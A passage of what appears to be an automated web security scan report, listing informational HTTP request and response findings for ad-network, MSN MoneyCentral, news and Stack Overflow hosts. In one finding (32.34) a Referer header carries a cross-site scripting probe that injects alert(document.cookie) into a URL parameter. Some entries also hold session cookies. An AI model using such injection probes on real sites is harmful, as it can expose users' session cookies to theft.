Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:40 GMT
Server: Barista/1.1-(eanlbh)
Connection: Close
Content-Length: 5210
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: fc_ms_1.3=EA; domain=.pulse360.com; path=/; expires=Sun, 06-Feb-2011 01:19:40 GMT

document.write('<style type="text/css"> div#p360-SL660x75msnbc-517F9430-C0FA-11DF-831B-94A93FF5047F { width: 660px; left: 0; font-family: sans-serif; position: relative; float: none;
...[SNIP]...

32.24. http://context3.kanoodle.com/cgi-bin/context.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://context3.kanoodle.com
Path:   /cgi-bin/context.cgi

Request

GET /cgi-bin/context.cgi?id=1000&db=context&query=*general_network:premium&cgroup=d_usnews&format=standard&numresults=5&linkcolor=003399&titlecolor=003399&fontsize=11&textcolor=666666 HTTP/1.1
Host: context3.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/search_spy.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:31 GMT
Server: Barista/1.1-(eanhbn)
Connection: Close
Content-Length: 3946
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css">.listing { background-color: #FFFFFF; font-size: 11px; font-family: ; width: 100%; border: 1px solid #FFFFFF; padding-left: 5px; }.listing_title {
...[SNIP]...

32.25. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1860849269@x23

Request

GET /2/B3DM/2010DM/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 171
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<!-- Segment Pixel ... Farmers_Brand_Exposed - DO NOT MODIFY -->
<img src="http://ib.adnxs.com/seg?add=81825&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->

32.26. http://ec.redcated/ds/UXULASONYSEL/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ec.redcated
Path:   /ds/UXULASONYSEL/

Request

GET /ds/UXULASONYSEL/ HTTP/1.1
Host: ec.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 400 Bad Request
Date: Sun, 30 Jan 2011 02:08:12 GMT
Content-Type: text/html
Content-Length: 15
Allow: GET
Connection: close

<html>
</html>

32.27. http://english.aljazeera.net/_inc/adsrc.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://english.aljazeera.net
Path:   /_inc/adsrc.html

Request

GET /_inc/adsrc.html?'+ord+' HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:45:25 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
Content-Length: 2046
ETag: "bf291890be4dcb1:cfb"
Last-Modified: Mon, 06 Sep 2010 12:25:16 GMT
Content-Type: text/html
Age: 135
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<html>
<body marginheight=0 marginwidth=0 topmargin=0 leftmargin=0>
<!-- begin ad tag: aljazeera_EN/africa (468x60) -->
<script language="JavaScript" type="text/javascript">

var str = window.p
...[SNIP]...

32.28. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Request

GET /news/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:46:12 GMT
Date: Sun, 30 Jan 2011 14:46:12 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
Content-Length: 58745
Content-Type: text/html
Age: 86
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- googleoff:
...[SNIP]...

32.29. http://geo.eyewonder.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://geo.eyewonder.com
Path:   /

Request

GET /?ddata=country HTTP/1.1
Host: geo.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://cdn.eyewonder.com/100125/767752/1419198/300x250_shell.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; ewroi=""

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 120
Expires: Sun, 30 Jan 2011 17:59:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:59:53 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="UTF-8"?>
<geoInfo clientIP="173.193.214.243">
<country>US</country>
</geoInfo>

32.30. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 23:41:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...

32.31. http://local.redacted/ten-day.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /ten-day.aspx

Request

GET /ten-day.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:47:51 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

32.32. http://local.redacted/weather.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /weather.aspx

Request

GET /weather.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:47:41 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

32.33. http://redacted/inc/Attributions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /inc/Attributions.asp

Request

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:48:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 26240
Content-Type: text/html
Expires: Sat, 29 Jan 2011 23:48:25 GMT
Set-Cookie: MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

32.34. http://redacted/inc/Views/Shared/Core/Content/js/utility.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utility.js

Request

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:53:16 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

32.35. http://redacted/investor/StockRating/srsmain.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srsmain.asp

Request

GET /investor/StockRating/srsmain.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 29010
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:31 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

32.36. http://redacted/investor/home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Request

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 16:51:21 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

32.37. http://redacted/investor/market/earncalendar/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/market/earncalendar/

Request

GET /investor/market/earncalendar/ HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 19872
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:26 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

32.38. http://redacted/investor/market/treasuries.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/market/treasuries.aspx

Request

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:47 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

32.39. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Request

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:12:39 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

32.40. http://redacted/investor/partsub/funds/topfunds.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/topfunds.asp

Request

GET /investor/partsub/funds/topfunds.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:12:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
cache-control: private
pragma: no-cache
Content-Length: 28823
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:12:56 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

32.41. http://redacted/investor/quotewatchlist.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/quotewatchlist.asp

Request

GET /investor/quotewatchlist.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 22945
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:32 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:Web xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

32.42. http://msn.whitepages.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.whitepages.com
Path:   /

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=A06546_10827|H05525_10833; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; __qca=P0-1307497695-1296350983104;

Response

HTTP/1.1 403 Forbidden
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Vary: Accept-Encoding
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:02 GMT
Connection: close
Content-Length: 1054

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!WhitePages.com - Seattle, WA>
<meta http-equiv="Pragma" content="no-cache">
<html>
<head>
   <title>WhitePages.com, Inc. Data Maintenanc
...[SNIP]...

32.43. http://mymsn.hotmail.redacted/cgi-bin/mymsn/mymsn.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mymsn.hotmail.msn.com
Path:   /cgi-bin/mymsn/mymsn.html

Request

GET /cgi-bin/mymsn/mymsn.html HTTP/1.1
Host: mymsn.hotmail.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:50:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Set-Cookie: MyMsn=1; domain=.redacted; path=/
Content-Length: 191
Cache-Control: private
Content-Type: text/html
HMServer: H: BAY142-F35.phx.gbl V: WIN2K3 10.31.0000.0101 i D: Dec 7 2007 15:33:41 S: 0

<html><head><title>MyMsn.html</title></head><body>MyMsn.html</body></html><!-- H: BAY142-F35.phx.gbl -->
<!-- V: WIN2K3 10.31.0000.0101 i -->
<!-- D: Dec 7 2007 15:33:41-->
<!-- S: 0-->

32.44. http://player.ooyala.com/info/primary/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /info/primary/

Request

GET /info/primary/ HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 413
Expires: Sun, 30 Jan 2011 12:49:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 12:49:00 GMT
Connection: close
Vary: Accept-Encoding

0rUzZg06AMIpM1+XiWY1NwIngAYgK7AH//ZAbmPZr9i1ivO3AZ99R9fLZRr/n8szkAfACfOLYP8G9I7CGFmFZCu7pBkNS/qR84JtlpczKdd/XBOmGV08ATKb8C2Rh416DfzgYfp5sbkbe0wf1Sg0zUTblr5d4eN7PfFYjtqzdLr88rPZng2NRdk5ksD3UHzdiR9ljpcy
...[SNIP]...

32.45. http://spe.redcated/ds/CJCNTCINGCIN/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.redcated
Path:   /ds/CJCNTCINGCIN/

Request

GET /ds/CJCNTCINGCIN/ HTTP/1.1
Host: spe.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 15
Allow: GET
Date: Sun, 30 Jan 2011 01:50:56 GMT
Connection: close

<html>
</html>

32.46. http://spe.redcated/ds/CJCNTCINGCP9/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.redcated
Path:   /ds/CJCNTCINGCP9/

Request

GET /ds/CJCNTCINGCP9/ HTTP/1.1
Host: spe.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 15
Allow: GET
Date: Sun, 30 Jan 2011 01:50:56 GMT
Connection: close

<html>
</html>

32.47. http://spe.redcated/ds/DEDENBARCISA/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.redcated
Path:   /ds/DEDENBARCISA/

Request

GET /ds/DEDENBARCISA/ HTTP/1.1
Host: spe.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 15
Allow: GET
Date: Sun, 30 Jan 2011 01:50:56 GMT
Connection: close

<html>
</html>

32.48. http://sstatic.net/Js/third-party/jquery.typewatch.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/third-party/jquery.typewatch.js

Request

GET /Js/third-party/jquery.typewatch.js HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/tags
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.49. http://sstatic.net/Js/third-party/openid-jquery.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/third-party/openid-jquery.js

Request

GET /Js/third-party/openid-jquery.js?v=7 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...

32.50. http://sstatic.net/Js/wmd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/wmd.js

Request

GET /Js/wmd.js?v=508538fa9757 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
